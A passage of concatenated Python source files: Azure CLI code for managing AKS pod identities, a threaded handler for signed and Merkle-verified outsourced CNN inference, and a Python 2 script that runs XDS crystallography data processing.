identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
|
threadHandler.py
|
#This class initilazises 3 threads to deal with taks in paralllel to CNN inference
import sys
import socket
import traceback
import cv2
from imutils.video import VideoStream
import imagezmq
import threading
import numpy as np
import time
import cv2
from nacl.signing import VerifyKey
from nacl.signing import SigningKey
from parameters import Parameters
import Responder as re
from merkletools import MerkleTools
import json
class ThreadHandler:
def __init__(self, hostname, port, merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk_Bytes, input_size, sendingPort):
self.hostname = hostname
self.port = port
self._stop = False
self._stop_message = ''
self._data = ''
self._data2 = ''
self._data3 = ''
self._data_ready = threading.Event()
self._data2_ready = threading.Event()
self._image_count = 0
self._received = threading.Event()
self._readyToReceive = threading.Event()
self._thread2 = threading.Thread(target=self._run, args=())
self._thread3 = threading.Thread(target=self._run2, args=(
merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk_Bytes, input_size))
self._thread4 = threading.Thread(target=self._run3, args=(
merkle_tree_interval, contractHash, hostname, sendingPort))
self._thread2.daemon = True
self._thread3.daemon = True
self._thread4.daemon = True
self._thread2.start()
self._thread3.start()
self._thread4.start()
# Thread 2 (receiving) section
def receive(self, timeout=15.0):
flag = self._data_ready.wait(timeout=timeout)
if not flag:
if self._stop:
sys.exit()
else:
self._stop = True
self._stop_message = "Contract aborted in Thread2 waiting for new images: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review"
print(self._stop_message)
raise TimeoutError(
"Contract aborted in Thread2 waiting for new images: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review")
self._data_ready.clear()
return self._data
def _run(self):
receiver = imagezmq.ImageHub(
"tcp://{}:{}".format(self.hostname, self.port), REQ_REP=False)
while not self._stop:
self._data = receiver.recv_jpg()
self._data_ready.set()
receiver.close()
# Thread 3 (decompressing, verifying, preporcessing) section
def _run2(self, merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk_Bytes, input_size):
vk = VerifyKey(vk_Bytes)
acknowledged_frames = 0
while not self._stop:
name, compressed = self.receive()
decompressedImage = cv2.imdecode(
np.frombuffer(compressed, dtype='uint8'), -1)
if name == 'abort':
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = 'Contract aborted by outsourcer according to custom'
print(self._stop_message)
sys.exit(self._stop_message)
if merkle_tree_interval == 0:
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-2]) + bytes(name[-1]), bytes(name[:-2]))
except:
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = 'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review'
print(self._stop_message)
sys.exit(self._stop_message)
if name[-1] < (self._image_count-2)*minimum_receive_rate_from_contractor or name[-1] < acknowledged_frames:
sys.exit(
'Contract aborted: Outsourcer did not acknowledge enough ouputs. Possible Consquences for Outsourcer: Blacklist, Bad Review')
acknowledged_frames = name[-1]
else:
# verify if signature matches image, contract hash, and image count, and number of intervals, and random number
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-5]) + bytes(name[-4]) + bytes(name[-3]) + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-5]))
except:
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = 'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review'
print(self._stop_message)
sys.exit(self._stop_message)
if name[-4] < (self._image_count-2)*minimum_receive_rate_from_contractor or name[-4] < acknowledged_frames:
sys.exit(
'Contract aborted: Outsourcer did not acknowledge enough ouputs. Possible Consquences for Outsourcer: Blacklist, Bad Review')
acknowledged_frames = name[-4]
# image preprocessing
# region
original_image = cv2.cvtColor(decompressedImage, cv2.COLOR_BGR2RGB)
image_data = cv2.resize(
original_image, (input_size, input_size)) # 0.4ms
image_data = image_data / 255. # 2.53ms
images_data = []
for i in range(1):
images_data.append(image_data)
images_data = np.asarray(images_data).astype(np.float32) # 3.15ms
self._data2 = (images_data, name, original_image)
self._data2_ready.set()
def receive2(self, timeout=15.0):
flag = self._data2_ready.wait(timeout=timeout)
if not flag:
if self._stop:
sys.exit()
else:
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = "Contract aborted in Thread3 receving from Thread2: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review"
print(self._stop_message)
raise TimeoutError(
"Contract aborted in Thread3 receving from Thread2: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review")
self._data2_ready.clear()
return self._data2
# Thread 4 (signing, sending, displaying) section
def putData(self, data, timeout=15):
flag = self._readyToReceive.wait(timeout=timeout)
if not flag:
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = "Contract aborted in Thread1 waiting for Thread4: Outsourcer probably timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review"
print(self._stop_message)
raise TimeoutError(
"Contract aborted in Thread3 receving from Thread2: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review")
self._readyToReceive.clear()
self._data3 = data
self._received.set()
def _run3(self, merkle_tree_interval, contractHash, hostname, sendingPort):
self._readyToReceive.set()
sk = SigningKey(Parameters.private_key_self)
dont_show = Parameters.dont_show
if Parameters.is_contractor == True:
display_name = 'Contractor'
else:
display_name = 'Verifier'
responder = re.Responder(hostname, sendingPort)
if merkle_tree_interval > 0:
mt = MerkleTools()
mtOld = MerkleTools()
interval_count = 0
mtOld_leaf_indices = {}
mt_leaf_indices = {}
current_challenge = 1
merkle_root = ''
last_challenge = 0
while not self._stop:
self._received.wait()
self._received.clear()
boxtext = self._data3[0]
image = self._data3[1]
name = self._data3[2]
self._image_count = self._data3[3]
if merkle_tree_interval == 0:
sig = sk.sign(boxtext.encode('latin1') +
contractHash).signature
sig = sig.decode('latin1')
# send reply
responder.respond(boxtext + ';--' + sig)
else:
image_count = self._image_count
outsorucer_signature = name[:-5]
outsourcer_image_count = name[-5]
outsourcer_number_of_outputs_received = name[-4]
outsourcer_random_number = name[-3]
outsourcer_interval_count = name[-2]
outsourcer_time_to_challenge = bool(name[-1])
mt.add_leaf(boxtext, True)
mt_leaf_indices[outsourcer_image_count] = image_count % merkle_tree_interval
response = boxtext
# time to send a new merkle root
# e.g. if inervall = 128 then all respones from 0-127 are added to the merkle tree
if image_count > 1 and (image_count+1) % merkle_tree_interval == 0:
mt.make_tree()
merkle_root = mt.get_merkle_root()
sig = sk.sign(merkle_root.encode(
'latin1') + bytes(interval_count) + contractHash).signature # sign merkle root
# resond with merkle root
response += ';--' + str(merkle_root) + \
';--' + sig.decode('latin1')
interval_count += 1
mtOld = mt # save old merkle tree for challenge
mtOld_leaf_indices.clear()
mtOld_leaf_indices = mt_leaf_indices.copy() # save old indices for challenge
mt_leaf_indices.clear() # clear for new indices
mt = MerkleTools() # construct new merkle tree for next interval
else:
# if this is true then the outsourcer has not received the merkle root yet -> send again
if interval_count > outsourcer_image_count:
sig = sk.sign(merkle_root.encode(
'latin1') + bytes(interval_count) + contractHash).signature # sign merkle root
response += ';--' + str(merkle_root) + \
';--' + sig.decode('latin1')
else: # in this case outsourcer has confirmed to have recieved the merkle root
# in this case outsourcer has sent a challenge to meet with the old merkle tree, give outsourcer 3 frames time to confirm challenge received before sending again
if outsourcer_time_to_challenge and image_count - last_challenge > 3:
last_challenge = image_count
if outsourcer_random_number in mtOld_leaf_indices:
# if challenge can be found, send proof back
outsourcer_random_number_index = mtOld_leaf_indices[
outsourcer_random_number]
else:
# if challenge index cannot be found return leaf 0
outsourcer_random_number_index = 0
proofs = mtOld.get_proof(
outsourcer_random_number_index)
stringsend = ''
for proof in proofs:
stringsend += ';--' # indicate start of proof
stringsend += proof.__str__() # send proof
stringsend += ';--'
# send leaf
stringsend += mtOld.get_leaf(
outsourcer_random_number_index)
stringsend += ';--'
stringsend += mtOld.get_merkle_root() # send root
stringarr = []
stringarr = stringsend.split(';--')
leaf_node = stringarr[-2]
root_node = stringarr[-1]
proof_string = stringarr[0:-2]
sig = sk.sign(str(stringarr[1:]).encode('latin1') + bytes(
interval_count-1) + contractHash).signature # sign proof and contract details
# attach signature
response += ';--' + sig.decode('latin1')
response += stringsend # attach challenge response to response
responder.respond(response)
# display image
if not dont_show:
# image.show()
image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)
cv2.imshow(display_name, image)
if cv2.waitKey(1) == ord('q'):
responder.respond('abort12345:6')
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = 'Contract aborted: Contractor ended contract according to custom'
print(self._stop_message)
sys.exit(self._stop_message)
self._readyToReceive.set()
def close(self):
self._stop = True
# Simulating heavy processing load
def limit_to_2_fps():
sleep(0.5)
|
sxdp_v1.py
|
'''
Date: Aug, 2017
S.Basu
'''
import os, sys, errno
import glob, time
import subprocess as sub
import h5py
import numpy as np
import multiprocessing as mp
import argparse, logging
import xds_input
import Merge_utls as merge
from cellprobe import Cell
from xscale_output import *
import matplotlib.pyplot as plt
class Xtal(object):
def __init__(self,xtalImgPath,xtalProcessPath,xtalNum, BL, tot_angle=360, **kwargs):
self.xtalimgpath = xtalImgPath
self.xtalprocesspath = xtalProcessPath
self.xtalnum = xtalNum
self.xtalname = None
self.osci = None
self.osci_range = tot_angle
self.datrange_str = None
self.bgrange_str = None
self.sprange_str = None
self.beamline = BL
self.SG = kwargs.get('SG', '0')
self.cell = kwargs.get('cell', "70 70 30 90 90 90")
self.res_cut = kwargs.get('res_cut', "2.5")
self.idx_res = kwargs.get('idx_res', "5.0")
self.friedel = kwargs.get('friedel', "FALSE")
self.refdata = kwargs.get('refdata', " ")
self.strong_pixel = kwargs.get('strong_pixel', '6.0')
self.min_pix_spot = kwargs.get('min_pix_spot', '3')
self.content = {}
def read_masterh5(self, master_file):
#read master file headers for xds.inp preparation
header = h5py.File(master_file, 'r')
#beam center x and y
beamx = header['/entry/instrument/detector/beam_center_x']
beamx = np.array(beamx);
self.content['beamX'] = beamx
beamy = header['/entry/instrument/detector/beam_center_y']
beamy = np.array(beamy)
self.content['beamY'] = beamy
#wavelength and detector distance
wave = header['/entry/instrument/beam/incident_wavelength']
wave = np.array(wave)
self.content['wavelength'] = wave
detZ = header['/entry/instrument/detector/detector_distance']
detZ = np.array(detZ)
self.content['detectorDistance'] = round(detZ*1e3) # convert distance into millimeter
#omega and oscillation
try:
omega = header['/entry/sample/goniometer/omega_increment']
omega = np.array(omega)
self.osci = omega
self.content['oscillationAngle'] = omega
except KeyError:
self.content['oscillationAngle'] = 0.1
#number of images
if self.osci_range is None:
nimages = header['/entry/instrument/detector/detectorSpecific/nimages']
nimages = np.array(nimages)
else:
nimages = round(float(self.osci_range)/self.osci)
nimages = int(nimages)
data_start = 1; data_end = nimages
#data_start = self.xtalnum*nimages + 1; data_end = (self.xtalnum+1)*nimages
self.datrange_str = (str(data_start), str(data_end))
self.sprange_str = self.datrange_str
self.bgrange_str = (str(data_start), str(data_start+10))
self.content['firstIndex'] = data_start; self.content['numFrames'] = nimages;
self.content['lastIndex'] = data_start+10
# xtal filename template with path
name = os.path.basename(master_file)
name = name.split( 'master' )
#self.xtalname = self.xtalimgpath + name[0]+"??????.h5"
img = name[0]+"??????.h5"
self.xtalname = os.path.join(self.xtalimgpath, img)
self.content['xtalname'] = self.xtalname;
def read_cbf(self, headerfile):
#read cbf file header and store the info in dictionary and later prepare xds.inp
cmd = "head -35 "+headerfile+" > filehead.txt"
sub.call(cmd, shell=True)
self.xtalname = headerfile[:-9]+"?????.cbf"
self.content['xtalname'] = self.xtalname
keys_head = ["Beam_xy","Wavelength", "Detector_distance","Angle_increment"]
fh = open('filehead.txt', 'r')
all_lines = fh.readlines()
fh.close()
for lines in all_lines:
if any(key in lines for key in keys_head):
line = lines.split()
if line[1] == 'Beam_xy':
self.content['beamX'] = str(line[2].strip('(').strip(','))
self.content['beamY'] = str(line[3].strip(')'))
elif line[1] == 'Wavelength':
self.content['wavelength'] = line[2]
elif line[1] == 'Detector_distance':
self.content["detectorDistance"] = str(float(line[2])*1e3)
else:
self.content["oscillationAngle"] = line[2]
self.content['numFrames'] = int(int(self.osci_range)/float(line[2]))
self.content['firstIndex'] = 1; self.content['lastIndex'] = 11;
def locatextalpath(self):
#Locate and sanity check if the data exists and then read the headers/master files
if not os.path.exists(self.xtalimgpath):
print 'Error: path does not exist\n'
sys.exit()
if self.beamline == "PXI":
master_file = glob.glob(os.path.join(self.xtalimgpath,"*_master.h5"))[0]
self.content['lib'] = '/exchange/mx/xds/library/dectris-neggia-centos6.so'
try:
self.read_masterh5(master_file)
except OSError:
raise OSError("master file may not exist\n")
elif self.beamline == "PXII" or self.beamline == "PXIII":
cbf_header = glob.glob(os.path.join(self.xtalimgpath,"*_00001.cbf"))[0]
try:
self.read_cbf(cbf_header)
except OSError:
raise OSError("cbf may not have collected yet\n")
def create_idx_inp(self):
try:
os.chdir(self.xtalprocesspath)
except OSError:
raise OSError("xtal process folder have not been created yet")
self.content['jobs']='XYCORR INIT COLSPOT IDXREF'
self.content['njobs'] = 4
try:
if os.environ['BEAMLINE_XNAME'] == 'X06SA':
self.content['nproc'] = 18
self.content['nodes'] = "x06sa-cn-117 x06sa-cn-118 x06sa-cn-119 x06sa-cn-120 x06sa-cn-121 x06sa-cn-122 x06sa-cn-123 x06sa-cn-124"
elif os.environ['BEAMLINE_XNAME'] == 'X06DA':
self.content['nproc'] = 12
self.content['nodes'] = "x06da-cn-1 x06da-cn-2"
elif os.environ['BEAMLINE_XNAME'] == 'X10SA':
self.content['nproc'] = 12
self.content['nodes'] = "x10sa-cn-1 x10sa-cn-2"
except KeyError:
if 'SLURM_NODELIST' in os.environ:
node_string = os.environ['SLURM_NODELIST']
node_num_list = node_string.strip('ra-c-[').strip(']').split('-')
self.content['nproc'] = 12
self.content['njobs'] = 2
self.content['nodes'] = 'ra-c-%s ra-c-%s' %(node_num_list[0], node_num_list[1])
if self.beamline == 'PXI':
sub.call(['module load dectris-neggia/17.09'], shell=True)
self.content['lib'] = os.path.join(os.environ['DECTRIS_NEGGIA_LIBRARY_DIR'], 'dectris-neggia.so')
else:
print 'On Ra-cluster, salloc was not done so using logging node, will be slow\n'
self.content['nproc'] = 12
self.content['njobs'] = 1
self.content['nodes'] = 'ra-c-001 ra-c-002 ra-c-003 ra-c-0004'
if self.beamline == 'PXI':
sub.call(['module load dectris-neggia/17.09'], shell=True)
self.content['lib'] = os.environ['DECTRIS_NEGGIA_LIBRARY_DIR']
if self.refdata != " " and os.path.isfile(self.refdata):
ref_link = 'reference.HKL'
os.symlink(self.refdata, ref_link)
self.content['referenceData'] = ref_link
else:
self.content['referenceData'] = " "
self.content['SG'] = self.SG; self.content['unit_cell'] = self.cell;
self.content['friedel'] = self.friedel; self.content['highres'] = 5.0
self.content['strong_pixel'] = self.strong_pixel; self.content['min_pix_spot'] = self.min_pix_spot;
inp_string = xds_input.INP[self.beamline]
if not os.path.isfile("XDS.INP"):
fh = open("XDS.INP", 'w')
fh.write(inp_string.format(**self.content))
fh.close()
else:
pass
def create_integrate_inp(self):
try:
os.chdir(self.xtalprocesspath)
except OSError:
raise OSError('xtal process folder may not be created yet')
self.content['jobs'] = 'DEFPIX INTEGRATE CORRECT'
self.content['highres'] = self.res_cut
if os.path.isfile("XDS.INP"):
sub.call(["cp XDS.INP indexing.INP"], shell=True)
inp_string = xds_input.INP[self.beamline]
fh = open("XDS.INP",'w')
fh.write(inp_string.format(**self.content))
fh.close()
else:
pass
def check_allfiles(self):
if self.beamline == 'PXII' or self.beamline == 'PXIII':
if len(str(self.content['numFrames'])) == 3:
tmp_str = '00'+str(self.content['numFrames'])
else:
tmp_str = '0'+str(self.content['numFrames'])
lastImage = self.content['xtalname'].strip('?????.cbf')+tmp_str+'.cbf'
wait_max = self.content['numFrames']*10
wait = 0;
while not os.path.exists(lastImage):
time.sleep(10)
print("waiting for the last image: %s" %lastImage)
wait += 5
if wait > wait_max:
print "all images were not saved, so processing timed out\n"
break
else:
pass
def runxds(self):
self.check_allfiles()
os.chdir(self.xtalprocesspath)
sub.call(['xds_par > /dev/null'], shell=True)
self.create_integrate_inp()
sub.call(['xds_par > /dev/null'], shell=True)
if not os.path.isfile("XDS_ASCII.HKL"):
print "xtal: %d failed from %s\n" %(self.xtalnum, self.xtalprocesspath),
else:
print "xtal: %d processed\n" %self.xtalnum,
class Process(object):
"""docstring for ClassName"""
def __init__(self, data_dir, output, BL, tot_angle=360):
self.data_folder = data_dir
self.process_folder = None
self.output = os.path.join(output, "proc")
if not os.path.exists(self.output):
os.makedirs(self.output, 0755)
else:
pass
self.nxtals = None
self.setname = None
self.setfolder = [];
self.dataName = None
self.process_folder = None
self.process_data = None
self.beamline = BL
self.ISa_th = 4.0
self.total_range = tot_angle
self.xscale_file_list = [];
self.xtals_lists = []
def Lookup(self):
if len(self.data_folder) == 0:
print "No image folder found \n"
return
for ii in range(len(self.data_folder)):
for dirs in sorted(glob.glob(os.path.join(self.data_folder[ii], "*set*"))):
if os.path.isdir(dirs) and len(os.listdir(dirs)) > 2:
self.setfolder.append(dirs)
return
def get_xtals(self, **kwargs):
for ii in range(len(self.data_folder)):
if self.data_folder[ii].endswith('*'):
parent_dir = self.data_folder[ii][:-1]
if not os.path.exists(parent_dir):
print "Error: data directory does not exist!\n"
sys.exit()
else:
if not os.path.exists(self.data_folder[ii]):
print "Error: data directory does not exist!\n"
sys.exit()
try:
os.chdir(self.output)
self.Lookup()
except OSError:
raise IOError("output path is not accessible\n")
sys.exit()
self.nxtals = len(self.setfolder)
if self.nxtals > 0:
for k in range(self.nxtals):
self.setname = os.path.basename(self.setfolder[k])
dir_von_sets = os.path.dirname(self.setfolder[k])
self.dataName = os.path.basename(dir_von_sets)
self.process_folder = os.path.join(self.output, self.dataName, self.setname)
self.process_data = os.path.join(self.output, self.dataName)
if not os.path.isdir(self.process_folder):
print "creating processing directory %s\n" %(self.process_folder),
os.makedirs(self.process_folder, 0755)
os.chdir(self.process_folder)
xtalobj = Xtal(self.setfolder[k], self.process_folder,k, self.beamline, self.total_range, **kwargs)
xtalobj.locatextalpath()
xtalobj.create_idx_inp()
self.xtals_lists.append(xtalobj)
else:
print "folder may exist, skipping %s\n" %(self.process_folder),
os.chdir(self.output)
print "%d xtals have been found \n" %len(self.xtals_lists)
return
def get_serial_eiger_xtals(self, **kwargs):
for ii in range(len(self.data_folder)):
if self.data_folder[ii].endswith('*'):
parent_dir = self.data_folder[ii][:-1]
if not os.path.exists(parent_dir):
print "Error: data directory does not exist!\n"
sys.exit()
else:
if not os.path.exists(self.data_folder[ii]):
print "Error: data directory does not exist!\n"
sys.exit()
try:
os.chdir(self.output)
self.Lookup()
except OSError:
raise IOError("output path is not accessible\n")
sys.exit()
if len(self.setfolder) > 0:
for i in range(len(self.setfolder)):
self.xtal_each_miniset = sorted(glob.glob(os.path.join(self.setfolder[i], "*data*.h5")))
self.nxtals = len(self.xtal_each_miniset) #num of xtals in each minisets
print "%d xtals in %s miniset \n" %(self.nxtals, self.setfolder[i]),
self.mininame = os.path.basename(self.setfolder[i])
dir_von_miniset = os.path.dirname(self.setfolder[i])
self.dataName = os.path.basename(dir_von_miniset)
puckname = os.path.basename(os.path.dirname(self.dataName))
self.process_data = os.path.join(self.output, puckname, self.dataName)
self.process_folder = os.path.join(self.output, puckname, self.dataName, self.mininame)
if not os.path.exists(self.process_folder):
print "creating processing directory %s" %(self.process_folder)
os.makedirs(self.process_folder, 0755)
else:
pass
os.chdir(self.process_folder)
for k in range(self.nxtals):
xtal_process_path = self.process_folder + '/xtal_' + str(k)
if not os.path.exists(xtal_process_path):
os.makedirs(xtal_process_path, 0755)
os.chdir(xtal_process_path)
xtalobj = Xtal(self.setfolder[i], xtal_process_path, k, self.beamline, self.total_range, **kwargs)
xtalobj.locatextalpath()
image_block = xtalobj.content['numFrames']
start_image = xtalobj.xtalnum*image_block+1
end_image = (xtalobj.xtalnum+1)*image_block
xtalobj.content['firstIndex'] = start_image
xtalobj.content['numFrames'] = end_image
xtalobj.content['lastIndex'] = start_image+10
xtalobj.create_idx_inp()
self.xtals_lists.append(xtalobj)
else:
print "folder may exist, skipping it %s\n" %xtal_process_path,
os.chdir(self.output)
print "\n %d xtals have been gathered\n" %len(self.xtals_lists)
return
def find_HKLs(self, **kwargs):
mergepaths = kwargs.get('mergepaths',[self.output])
try:
os.chdir(self.output)
except OSError:
print "check if the output folder exists\n"
for path in mergepaths:
for parent, dirs, files in os.walk(path):
for fh in files:
if fh == "XDS_ASCII.HKL":
HKLpath = os.path.join(parent,fh)
self.xscale_file_list.append(HKLpath)
else:
pass
return
def runeiger(self):
job_cnt = 0
if len(self.xtals_lists) > 0:
for j in range(len(self.xtals_lists)):
proc = [];
for i in range (0,4):
try:
jobid = mp.Process(target=self.xtals_lists[(j*4)+i].runxds)
proc.append(jobid)
except IndexError:
pass
for p in proc:
p.start()
for p in proc:
p.join()
print "%d crystals have been attempted\n" %((j+1))
def runpilatus(self, expt):
job_cnt = 0
if expt == 'native-sad':
try:
for j in range(len(self.xtals_lists)):
self.xtals_lists[j].runxds()
job_cnt += 1
print "%d crystals have been attempted\n" %job_cnt
except Exception:
raise Exception("no xtals found to run xds or other error, check\n")
elif expt == 'serial-xtal':
try:
for j in range(len(self.xtals_lists)):
proc = [];
for i in range (0,10):
try:
jobid = mp.Process(target=self.xtals_lists[(j*10)+i].runxds)
proc.append(jobid)
except IndexError:
pass
for p in proc:
p.start()
for p in proc:
p.join()
print "%d crystals have been attempted\n" %(j+1)
except Exception:
raise
def options():
parser = argparse.ArgumentParser()
parser.add_argument("--image_path", type=str, nargs='+', \
help="provide path for each well, containing minisets folder or provide path for parent folder, containing all wells, e.g. your/path/to/parent/<well-id> or your/path/to/parent")
parser.add_argument("--output_dir", type=str, \
help="provide path where processing stuffs will be dumped using identical directory tree")
parser.add_argument("--BeamID", type=str, help="Beamline ID needs to be specified, eg. PXI or PXII\n")
parser.add_argument("--method", type=str, help="Mention either native-sad or serial-xtal\n")
parser.add_argument("--total_degree", type=str, help="provide angular range to process.It's mutually exclusive with start/end_omega keywords")
parser.add_argument("--SG_num", type=str, default="0", \
help="optionally, Space-group number can be specified, default is 0")
parser.add_argument("--cell", type=str, default="70 70 30 90 90 90", \
help="optionally, unit-cell can be specified as 70 70 30 90 90 90; otherwise it will try to determine by itself")
parser.add_argument("--highres", type=str, default="2.5", \
help="optionally high-resolution limit can be given, default: 2.5")
parser.add_argument("--friedel", type=str, default="FALSE", help="optionally, it can be changed to true..")
parser.add_argument("--refs", type=str, help='optionally, reference data set for indexing can be provided..')
parser.add_argument("--strong_pixel", type=str)
parser.add_argument("--min_pix_spot", type=str)
parser.add_argument("--ISa_cutoff", type=str, default= "3.0")
parser.add_argument("--merge_paths", type=str, nargs='+')
args = parser.parse_args()
return args
def main():
args = options()
if args.image_path is None:
sys.exit("you didn't tell me where data is\n")
elif args.output_dir is None:
print "no output path provided, dumping everything in current directory\n"
args.output_dir = os.getcwd()
elif args.BeamID is None:
sys.exit("Beamline has to be mentioned, e.g. PXI, PXII, or PXIII\n")
elif args.total_degree is None:
args.total_degree = 360
elif args.method is None:
sys.exit("Please specify the method, either native-sad or serial-xtal\n")
keywords = {}
if args.SG_num != None:
keywords['SG'] = args.SG_num
if args.cell != None:
keywords['cell'] = args.cell
if args.highres != None:
keywords['res_cut'] = args.highres
if args.friedel != None:
keywords['friedel'] = args.friedel
if args.refs != None:
keywords['refdata'] = args.refs
if args.strong_pixel != None:
keywords['strong_pixel'] = args.strong_pixel
if args.min_pix_spot != None:
keywords['min_pix_spot'] = args.min_pix_spot
merge_keys = {}
if args.ISa_cutoff != None:
merge_keys['isa_cut'] = args.ISa_cutoff
if args.highres != None:
merge_keys['res_cut'] = args.highres
merge_hkls = {}
if args.merge_paths != None:
merge_hkls['mergepaths'] = args.merge_paths[0].split()
proc = Process(args.image_path, args.output_dir, args.BeamID, args.total_degree)
if proc.beamline == "PXI" and args.method == 'serial-xtal':
proc.get_serial_eiger_xtals(**keywords)
else:
proc.get_xtals(**keywords)
if proc.beamline == "PXI":
proc.runeiger()
else:
proc.runpilatus(args.method)
#Merging with Merge_utls..
proc.find_HKLs(**merge_hkls)
mm = merge.Merge_utls(sorted(proc.xscale_file_list), args.method, **merge_keys)
results = mm.run_()
if args.method == 'native-sad':
try:
print "No selection table with xtals: %d\n" %results['xtals_found']
print_table(results['nSAD_xscale_stats'])
print'\nISa selection table with xtals: %d\n' %results['xtals_after_isa']
print_table(results['ISa_selection'])
except KeyError:
print "Either ISa-select is not set or XSCALE stats not found\n"
else:
try:
print "No selection table with xtals: %d\n" %results['xtals_found']
print_table(results['no_selection'])
print '\nISa selection table with xtals: %d\n' %results['xtals_after_isa']
print_table(results['ISa_selection'])
print '\nCell selection table with xtals: %d\n' %results['xtals_after_cell']
print_table(results['cell_selection'])
print '\npair-CC selection table with xtals: %d\n' %results['xtals_after_pCC']
